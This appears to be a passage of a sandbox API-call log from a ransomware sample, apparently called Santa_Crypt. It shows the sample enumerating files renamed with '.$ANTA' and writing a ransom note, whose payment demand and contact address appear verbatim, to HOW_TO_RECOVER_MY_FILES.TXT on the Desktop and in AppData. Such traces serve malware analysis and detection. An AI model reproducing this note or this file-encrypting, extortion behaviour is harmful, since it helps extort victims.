returned 1 [0135.240] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.240] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.240] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.240] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x198078e9, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x198078e9, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x198ec746, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xf440, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="5N nlGCuCJHLr.gif.$ANTA", cAlternateFileName="5NNLGC~1.$AN")) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0135.241] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0135.241] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0135.241] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0135.241] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0135.241] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19b02865, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x19b02865, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x19bc140d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x2ba0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="5qUH.doc.$ANTA", cAlternateFileName="5QUHDO~1.$AN")) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0135.241] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0135.241] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.242] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0135.242] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0135.242] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19e9609a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x19e9609a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1a0d23da, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8240, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="b029yG4LTNtgmmqX_G.odp.$ANTA", cAlternateFileName="B029YG~1.$AN")) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0135.242] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0135.242] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0135.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0135.243] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0135.243] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0135.243] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a891fe1, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1a891fe1, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1aa5bc62, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x4ca0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="D-AgzySFKdtUp0Q.doc.$ANTA", cAlternateFileName="D-AGZY~1.$AN")) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.243] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0135.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.244] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0135.244] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.244] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ab669d0, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1ab669d0, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1ac2564c, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="dcplTjPjl4z2QV.odp.$ANTA", cAlternateFileName="DCPLTJ~1.$AN")) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0135.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ae15520, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1ae15520, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1af20507, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x17610, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="g6f-14R3g3sZGYbIp.jpg.$ANTA", cAlternateFileName="G6F-14~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b0ea1e7, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1b0ea1e7, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1b1366d2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x13c60, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="Jk_T2yqTjjg2-B-HH.flv.$ANTA", cAlternateFileName="JK_T2Y~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b3769bf, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1b3769bf, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1bba4bcc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x6a40, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="lB o7wz9.bmp.$ANTA", cAlternateFileName="LBO7WZ~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bfaaabf, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1bfaaabf, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1c3180fc, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="M9-n.avi.$ANTA", cAlternateFileName="M9-NAV~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c5a0958, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1c5a0958, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1c6d1aea, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x135e0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="MjT96UMRMqqhF.swf.$ANTA", cAlternateFileName="MJT96U~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c7a6a92, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1c7a6a92, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1c843efa, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x132d0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="PhzRCCH.jpg.$ANTA", cAlternateFileName="PHZRCC~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c928f0a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x1c928f0a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1cb18bac, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x13850, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="xvNld.ots.$ANTA", cAlternateFileName="XVNLDO~1.$AN")) returned 1 [0135.244] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2750, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2750, ftLastWriteTime.dwLowDateTime=0x43e9128, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="ﲘмńဓ+\x10")) returned 0 [0135.245] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0135.245] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0135.245] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x144f218 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0135.246] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW_TO_RECOVER_MY_FILES.TXT" (normalized: "c:\\users\\fd1hvy\\desktop\\how_to_recover_my_files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0135.246] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.246] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f844 | out: lpNewFilePointer=0x0) returned 1 [0135.246] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.246] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.246] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f834 | out: lpNewFilePointer=0x0) returned 1 [0135.246] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144f85c*=0x0, lpOverlapped=0x0) returned 1 [0135.246] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.247] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144f824 | out: lpNewFilePointer=0x0) returned 1 [0135.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 200 [0135.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", cchWideChar=200, lpMultiByteStr=0x4365138, cbMultiByte=200, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!!!SANTA_CRYPT RANSOMWARE!!!\r\nHello. All your files are encrypted. To decrypt your files - you must pay us.\r\nAmount to pay depends on how fast you will email us.\r\nOur email : mail@mail.ru\r\nGood luck!", lpUsedDefaultChar=0x0) returned 200 [0135.247] WriteFile (in: hFile=0x258, lpBuffer=0x19d20a8*, nNumberOfBytesToWrite=0xc7, lpNumberOfBytesWritten=0x144f85c, lpOverlapped=0x0 | out: lpBuffer=0x19d20a8*, lpNumberOfBytesWritten=0x144f85c*=0xc7, lpOverlapped=0x0) returned 1 [0135.248] CloseHandle (hObject=0x258) returned 1 [0135.249] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x144f218 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 0x0 [0135.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0135.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0135.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0135.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0135.251] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\HOW_TO_RECOVER_MY_FILES.TXT" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\how_to_recover_my_files.txt"), 